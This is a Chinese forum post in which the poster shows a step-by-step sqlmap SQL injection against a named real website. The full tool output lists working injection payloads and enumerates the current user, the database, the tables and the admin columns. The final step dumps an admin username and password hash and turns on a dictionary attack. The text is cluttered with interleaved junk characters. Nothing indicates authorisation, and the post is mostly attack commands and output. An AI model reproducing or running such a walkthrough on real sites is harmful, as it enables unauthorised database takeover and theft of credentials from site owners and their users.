找回密码
 立即注册
查看: 3352|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
3 |9 U* ^: v) o3 k) ^& M8 i( N- Dms "Mysql" --current-user       /*  注解:获取当前用户名称' m" B+ \( C2 E% |) y/ F
    sqlmap/0.9 - automatic SQL injection and database takeover tool3 y3 N; ~  J$ p7 p4 J& A; b7 o
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    9 r( T) @! t+ f4 A6 H[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as$ F& a% e2 x0 o6 z7 R" O
    session file
    ( @8 P/ E4 G7 c* l! n[16:53:54] [INFO] resuming injection data from session file
    " f- M! y! q) r& y" n[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file" t8 t4 O+ u; S  Y( V# m# D" A% b
    [16:53:54] [INFO] testing connection to the target url
    1 H8 g' \# v/ Asqlmap identified the following injection points with a total of 0 HTTP(s) reque
    / r$ q  \! D8 `% Z6 |, t5 y4 Psts:2 i" C' O! k# w, o+ ]( Q8 V0 s
    ---8 G( e' G1 a; h+ x$ k! f3 a
    Place: GET
    4 y$ R  t$ ]$ ]2 F; R* `Parameter: id
    ; t9 i5 E- a) I, E    Type: boolean-based blind
    ( j" L" o6 J7 ]7 Y) R    Title: AND boolean-based blind - WHERE or HAVING clause" ~  L3 ^% y1 V- x# c
        Payload: id=276 AND 799=799
    / i5 f4 O. a+ j, F! h8 ?    Type: error-based
    4 Z, w+ D# `) q+ [0 P! @0 W    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    # F6 @- ]$ f4 M' q7 l3 D! `    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    0 j6 l2 c# X3 ]; S, l: E120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    / G9 y! L6 V# O5 e+ Q1 g),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    % t5 B8 J8 \  _# C- n    Type: UNION query$ h+ q0 ?% R, q2 \3 T! L
        Title: MySQL UNION query (NULL) - 1 to 10 columns, P% B! u3 p( b% n! N* [1 C
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    $ @. h, F# y2 X- X- z8 f% g- f* t; h(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),5 C+ e, q) x* ?4 Y" B% U
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    ! U( h* C4 A" n* {( P! ?) O  c    Type: AND/OR time-based blind5 {$ S2 Q$ v0 e/ N3 H, g2 ^
        Title: MySQL > 5.0.11 AND time-based blind
    9 o" u) a4 Q. \* R0 R  D5 L+ J    Payload: id=276 AND SLEEP(5)
    5 P& o& q, r' o---
    * C" p. p1 B7 V/ x$ O" ~* O[16:53:55] [INFO] the back-end DBMS is MySQL9 X9 `+ W* F' Q
    web server operating system: Windows
      x, L3 U* i6 F4 U" L1 W9 m: N( |web application technology: Apache 2.2.11, PHP 5.3.0/ u5 b) ~1 f$ r: P
    back-end DBMS: MySQL 5.0
    5 f2 K5 P9 {1 _% v[16:53:55] [INFO] fetching current user0 ~0 S& r& A# J
    current user:    'root@localhost'   ; h7 ~8 g- x8 l
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou% x% x3 c) l- O% j6 r8 D" @( C
    tput\www.wepost.com.hk'
  • shutting down at: 16:53:583 P7 y+ H+ o% y. A6 W

    ' f  h4 H( {* M. K8 c- U* _# s0 mD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    1 c; h# ~$ V! ~* S/ F% D# rms "Mysql" --current-db                  /*当前数据库" v5 M% W- n& y4 ?" c9 G. A3 Z
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    + [' Z1 @) v8 h    http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    9 j1 y4 ~/ S, X" D0 V+ }[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as# h6 q' h6 {& o+ b, X, ?
    session file; j; S/ p7 ~  z+ \) ~2 \
    [16:54:16] [INFO] resuming injection data from session file
      J: I0 N5 r5 P, \+ a* Q[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file7 h* ^7 d) U3 d. }7 ~" f8 Z
    [16:54:16] [INFO] testing connection to the target url+ S( }9 m6 y' [3 q4 c; Z
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    & q4 Q. K& k$ [* Q7 ssts:
    % j; s4 Z8 y9 @) p3 F* r---
    6 b$ a! M) a5 c0 [5 pPlace: GET% o8 Z$ w% V) Q$ _& v: f
    Parameter: id% }6 }/ z  I+ u; }. p
        Type: boolean-based blind7 }! i2 N7 k& o$ m! h
        Title: AND boolean-based blind - WHERE or HAVING clause: f/ l1 ~. ]1 A7 X$ W
        Payload: id=276 AND 799=799% l4 s) ^. b1 j1 c& X
        Type: error-based
    + p9 }- I- p0 g  O* s& }* `% q    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause3 b4 s+ R$ D5 y, N3 o
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,. [$ L8 \0 r/ ?' `+ W5 y# \3 r
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58+ S4 o( D& }8 I' U! R
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    3 e  U* Z  R' w    Type: UNION query
    * c# T1 V& Z1 r: T, i  V1 H    Title: MySQL UNION query (NULL) - 1 to 10 columns/ A0 L& A( Q+ O0 O
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ; b5 a2 g; `. Z(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    / ]% e. u; J3 A! u; k/ e. oCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
      [7 A& B) M: V/ Q3 c' {    Type: AND/OR time-based blind, r: L' Y6 i% l4 u
        Title: MySQL > 5.0.11 AND time-based blind
    $ a( |6 }  d! q; t" A    Payload: id=276 AND SLEEP(5)
    8 Q, m. _3 l: r: I---
    1 s: P" a4 P- P[16:54:17] [INFO] the back-end DBMS is MySQL
    $ N6 G( r: \0 ^web server operating system: Windows
    " I8 c$ {+ y8 Jweb application technology: Apache 2.2.11, PHP 5.3.0
    9 r, F  f8 C. [4 {( ?# @back-end DBMS: MySQL 5.0
    ! ^: k  v# f! o, D[16:54:17] [INFO] fetching current database& b: B, B  X7 }% R, C5 U2 A
    current database:    'wepost'5 v0 {/ X  R" \# ~9 ?+ b
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou6 [- x" p4 O$ l% g
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    - h+ T, g( w2 Y1 _' r" iD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db; \& W# t+ x, y% S3 G& B3 I6 D7 y
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名/ B% Z1 b' N7 v) h. l
        sqlmap/0.9 - automatic SQL injection and database takeover tool+ \3 R, E' n( Z+ f/ p4 {
        http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    / _. J# G/ D4 o' D3 e4 @[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    % ~$ n% N  k+ q, Z session file
    / i) q! W7 J  _( A% ^[16:55:25] [INFO] resuming injection data from session file
    9 a  S( ^9 \. L7 J; L[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    1 @$ N5 Y+ b  V& H" Y! P8 A( L[16:55:25] [INFO] testing connection to the target url
    % p$ v( X3 Z$ f! _0 `2 i2 dsqlmap identified the following injection points with a total of 0 HTTP(s) reque8 i# R+ r3 m2 t8 `( Y$ D
    sts:% h# z& F( I  C$ p7 A" ~8 Y
    ---
    + M/ B4 m) p3 {' h# s' y3 HPlace: GET
    1 f  C+ I  C- D. i) wParameter: id* k; Z! m( V' Q+ H' Y
        Type: boolean-based blind
    3 ]- U; a/ k6 S1 A    Title: AND boolean-based blind - WHERE or HAVING clause/ ]! P1 G& G0 c: \4 J" @0 x
        Payload: id=276 AND 799=799
    * u( G# a* O" ^) d! K- {/ P$ W    Type: error-based
    / f7 T# q3 T5 w    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    - B2 L) U! _  m7 H! ?7 A* Z9 i$ r    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,, m4 p) `6 o  [1 N6 Q$ l
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    2 L1 n1 j1 ?6 ^6 A& y: z),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    / M& e& ^& V: |+ A2 p: `    Type: UNION query
    ( N) s, C5 X% U# Z4 R& Y+ M    Title: MySQL UNION query (NULL) - 1 to 10 columns
    $ M) w+ T6 L+ k    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR( S" J- u, a6 k7 E
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    / J2 x6 f/ B( u7 `$ ACHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    % H. C( I6 A# _9 _$ d8 p    Type: AND/OR time-based blind  T5 t: N  i4 i
        Title: MySQL > 5.0.11 AND time-based blind
      o7 M1 D2 [! h+ u) E0 J, |. Z9 U1 ]8 \    Payload: id=276 AND SLEEP(5)
    0 [( z4 [" M; Y( B5 N---, B' z: o$ Y! D, w& e% U' P
    [16:55:26] [INFO] the back-end DBMS is MySQL
    : A2 l1 B. V- kweb server operating system: Windows
    % A$ w3 J3 ~* K' x: D% Q. M& t+ r, A+ mweb application technology: Apache 2.2.11, PHP 5.3.0& I( e6 \5 ^: C- p- p0 ~+ X
    back-end DBMS: MySQL 5.05 [% F8 k7 D0 q- L- U% v: {
    [16:55:26] [INFO] fetching tables for database 'wepost'
    " T2 s! Q: J) |' _$ w[16:55:27] [INFO] the SQL query used returns 6 entries. h5 D% x% \8 n
    Database: wepost
    . p) o: U4 r! t$ X& Y[6 tables]
    - K; n' }5 J/ H" F+ X3 _+-------------+
    * _* F4 L. E& p& N; m9 B| admin       |9 \' n" F. d9 R9 s* [4 L
    | article     |% X4 j5 C+ O6 l4 A$ d) Z2 Q
    | contributor |3 g# B8 i/ E) H4 k( S5 ]
    | idea        |0 J# X+ L4 @' H8 I2 c
    | image       |
    " ^. H+ z) p1 y| issue       |
    ' b" X8 \2 [0 M/ v+-------------+
    : U$ M* |* p1 f, R+ F3 C, q% c[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou+ r7 ^2 [: B3 V. o
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:333 `$ M/ W# L/ P% Y; j. Y( O
    9 C4 P9 [: z: ?+ k4 a+ y" ^& D
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db7 M5 S+ l) v% g$ m% T, ~0 m
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名+ U( [: V, a7 e
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    9 Q, u" q) |# y$ u: Y5 O- D    http://sqlmap.sourceforge.net
  • starting at: 16:56:06! U1 F3 T8 |9 t9 e; w* S
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    1 F* j% N3 P. K4 ^sts:0 v9 K' w5 o3 Q. W4 p# ?+ w
    ---
    * [" T, Z' ]. ?& C0 s, QPlace: GET
      N0 W0 ~. G3 \. ]Parameter: id& B3 }, R  C& X, U- m# o9 C
        Type: boolean-based blind
    - w" O+ }2 y/ \2 m. J% D    Title: AND boolean-based blind - WHERE or HAVING clause
    ' j, P% q1 ]4 u& g( p0 y    Payload: id=276 AND 799=799
    / q, X6 s( E* I5 ?! @    Type: error-based
    8 t$ \. V$ {! G: ]% ?    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 R2 A4 y2 z' q* ~" M& Y' w5 R) p- Q* ?
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,) \0 O" u& z1 t: f  e9 q
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58' i; K3 W- N' F! p5 e$ s- ~6 X: }
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a). B* t0 R9 n. D
        Type: UNION query( k0 n3 I/ Z1 J. e6 T' h" |6 Z
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    3 k8 `! _. U5 @4 K: h2 y! _    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    " h2 o0 f+ A' X7 z6 m( ^; M) C/ F(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    . p+ ?" L) I! \$ ECHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    & O. A+ ]* x4 J' i7 b1 Z1 l4 W. C# m    Type: AND/OR time-based blind) w+ `$ Z  p7 Z/ R
        Title: MySQL > 5.0.11 AND time-based blind, A3 G& q0 K4 Y' C
        Payload: id=276 AND SLEEP(5)
    * T, D0 P: R9 {' @5 r5 N0 e---; z2 [* x! ?& K* R$ n8 |0 s6 h* ]1 L
    web server operating system: Windows
    + ]/ c' s+ ~- B1 ~. s5 N5 J7 }web application technology: Apache 2.2.11, PHP 5.3.0
      W- F9 f' H0 q# n( aback-end DBMS: MySQL 5.0- r3 K7 a+ j) a3 t* K8 j& ?6 P
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    0 g8 C% j* R2 h# j! v, d6 C# Zssion': wepost, wepost4 R" M5 p5 g9 j2 i( l
    Database: wepost& R% j7 _7 k0 ]6 E. s
    Table: admin* C; y8 }( N* Y, J. ^% B
    [4 columns]
    1 g5 ~/ n, l& e* h+----------+-------------+# H5 m" F2 a* R
    | Column   | Type        |; S' J/ c9 P9 V* ~" k; Y
    +----------+-------------+
    8 \0 p# _. y+ l| id       | int(11)     |
    ; P! G, }$ l. o% n2 [& F. m| password | varchar(32) |
    9 D# T9 H! V  ]6 L  ?| type     | varchar(10) |
    2 Q( x$ {, k% o) C! @| userid   | varchar(20) |! ^* n( \# G, `8 R/ P- W, T
    +----------+-------------+
    9 n0 D' X' I& q5 e4 M
  • shutting down at: 16:56:19
    2 O% Q: w0 A/ }* _4 r( f4 p# i
    $ @) M2 z) z/ C& \0 UD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    # J( ~* J3 [6 B) k* U8 M) ]+ qms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    " u0 W- \! o9 Y4 K7 j' B    sqlmap/0.9 - automatic SQL injection and database takeover tool
    : _& u; p* y3 W  N- x  ]! g    http://sqlmap.sourceforge.net
  • starting at: 16:57:14& @( C5 ?9 o9 G' j
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque) z% \- C7 x, V2 _) J  q1 s( q8 W
    sts:
    4 n5 @9 `* k* n, N' z---
    ; y( t" |( \/ kPlace: GET
    # c$ W4 F9 F( O# s& RParameter: id1 N" W$ q2 K' w7 d7 T
        Type: boolean-based blind
      [# }$ Y- w& V. l: J9 p    Title: AND boolean-based blind - WHERE or HAVING clause% q* r2 p3 B# V; P
        Payload: id=276 AND 799=799. G' {; i3 O; D9 E
        Type: error-based
    , J/ {' @- f! M8 v& H' U  J3 [4 h    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause  A, M1 y; u1 f, X6 E
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    5 n& N/ J8 n9 s  s3 E/ N1 A: D, Y+ O( Y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    & l6 f# u3 u/ D),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    $ @  p' p$ \9 }% N8 z    Type: UNION query
    0 X3 }) h0 g, D) b& M    Title: MySQL UNION query (NULL) - 1 to 10 columns
    ' {) _) L/ [& Z) O! ~- e    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    " }3 C( H! o2 P(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),3 ^- k' ^9 R( V9 R# u
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL## w$ ?- Z; T$ e4 F$ f; l
        Type: AND/OR time-based blind
    ) q. t2 e' {7 J0 m+ R; \    Title: MySQL > 5.0.11 AND time-based blind! y# R/ L1 O; [3 m7 ?  G' ?$ W
        Payload: id=276 AND SLEEP(5)% n! j, b3 N+ m# Q6 M% ~. n
    ---3 n( }4 u+ f5 Z- [5 z" d( X7 A; B
    web server operating system: Windows; p& d* z. A) Z1 q
    web application technology: Apache 2.2.11, PHP 5.3.09 N- I! O7 N- ?, x2 [/ A; m7 u
    back-end DBMS: MySQL 5.0' T8 E9 x& R" `5 e
    recognized possible password hash values. do you want to use dictionary attack o
    8 ?0 I: J" n4 j6 r% ]n retrieved table items? [Y/n/q] y
    " F, w- k0 v; `, P& S3 m$ Qwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
    ! C9 a% M# `& ]' t1 H6 [do you want to use common password suffixes? (slow!) [y/N] y
    8 i1 e3 H: G9 P* [6 D/ ADatabase: wepost+ V0 F; w# ?# |" C
    Table: admin* z! [5 D  T4 I) O$ _8 p. I: d
    [1 entry]3 U; w( c' W) k2 W3 }7 G
    +----------------------------------+------------+
    3 g9 K$ C8 d- i" l| password                         | userid     |$ f) c- R* U, T
    +----------------------------------+------------+
    3 k( S; o9 P9 @" r! b2 {7 l| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |! ~* h4 u  c; h& p: L
    +----------------------------------+------------+
    - ]6 ~+ O1 `! k% P+ @& {
  • shutting down at: 16:58:14
    4 G9 m. n2 R  k/ w  n' D. h
    3 ^. C* N0 g% d; r4 FD:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表